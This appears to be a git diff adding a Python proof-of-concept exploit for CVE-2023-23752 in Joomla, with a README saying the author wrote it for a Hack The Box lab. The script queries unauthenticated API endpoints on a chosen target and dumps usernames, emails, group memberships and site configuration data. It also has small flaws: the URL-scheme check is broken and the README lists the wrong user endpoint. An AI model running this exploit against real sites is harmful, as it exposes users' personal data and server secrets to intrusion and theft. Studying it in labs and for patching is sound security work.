diff --git a/CVE-2023-23752.py b/CVE-2023-23752.py new file mode 100644 index 0000000..bef468d --- /dev/null +++ b/CVE-2023-23752.py @@ -0,0 +1,76 @@ +import requests +import json +import argparse + +class User: + def __init__(user, name, email, lastvisitDate, groupNames): + user.name = name + user.email = email + user.lastvisitDate = lastvisitDate + user.groupNames = groupNames + + def __str__(user): + return f"Username: {user.name}\nEmail: {user.email}\nLast Visit: {user.lastvisitDate}\nGroups: {user.groupNames}" + +def vulnCheck(tgt): + verUrl = tgt + "/administrator/manifests/files/joomla.xml" + verData = requests.get(verUrl) + if len(verData.text) == 0 or "404" in verData.text.lower() or "403" in verData.text.lower(): + print("[-] Site does not appear to be vulnerable!") + raise SystemExit + +def getUsers(tgt): + usrUrl = tgt + "/api/index.php/v1/users?public=true" + usrData = requests.get(usrUrl) + if "404" in usrData.text.lower() or "403" in usrData.text.lower(): + print("[-] Error fetching user data, site may not be vulnerable") + raise SystemExit + parsedUsrs = json.loads(usrData.text) + return parsedUsrs + +def parseUsers(usrData): + users = [] + for user in usrData["data"]: + userAtribs = user["attributes"] + newUser = User(userAtribs["username"], + userAtribs["email"], + userAtribs["lastvisitDate"], + userAtribs["group_names"] ) + users.append(newUser) + return users + +def getConfig(tgt): + cfgUrl = tgt + "/api/index.php/v1/config/application?public=true" + cfgData = requests.get(cfgUrl) + if "404" in cfgData.text.lower() or "403" in cfgData.text.lower(): + print("[-] Error fetching user data, site may not be vulnerable") + raise SystemExit + parsedCfg = json.loads(cfgData.text) + return parsedCfg + + + +if __name__ == "__main__": + parser = argparse.ArgumentParser(prog='Joomla Info Disclosure CVE-2023-23752', description='This is a PoC for CVE-2023-23752, an information disclosure vulnerability in Joomla < 4.2.8', epilog='Written by 0xVoodo') + parser.add_argument('-t', '--target', required=True, help='Target IP/URL') + args = parser.parse_args() + + tgt = args.target.lower() + + if tgt[4] != "http" and tgt[5] != "https": + print("[*] No URL schema specified, defaulting to HTTP") + tgt = "http://" + tgt + + vulnCheck(tgt) + + print(f"\n[+] User data found!") + print("----------") + for user in parseUsers(getUsers(tgt)): + print(user) + print("----------") + + print(f"\n[+] Config data found!") + print("----------") + for i in getConfig(tgt)["data"]: + print(i["attributes"]) + diff --git a/README.md b/README.md index 3a7076a..616162e 100644 --- a/README.md +++ b/README.md @@ -1,2 +1,27 @@ -# CVE-2023-23752 - CVE-2023-23752 - Joomla Information Disclosure Vulnerability +# CVE-2023-23752 - Joomla Information Disclosure + +Yo, I needed to use this exploit in a HTB machine and the only other PoC I could find was written in ruby... + +I didn't wanna mess with the ruby dependancies so I just re-wrote it in python "real quick". + +--- +This is basically just a parser for the JSON returned by the open API endpoints, this can be replicated easily with CURL or a web browser by hitting the following endpoints: + +#### User Info + +`/api/index.php/v1/config/applicaton?public=true` + +#### Config Info + +`/api/index.php/v1/config/application?public=true"` + +## Usage +`python3 CVE-2023-23752.py -t ` + +--- + + +# License +GPL v3.0 - as all good software should be + +Remember - don't be a skid :)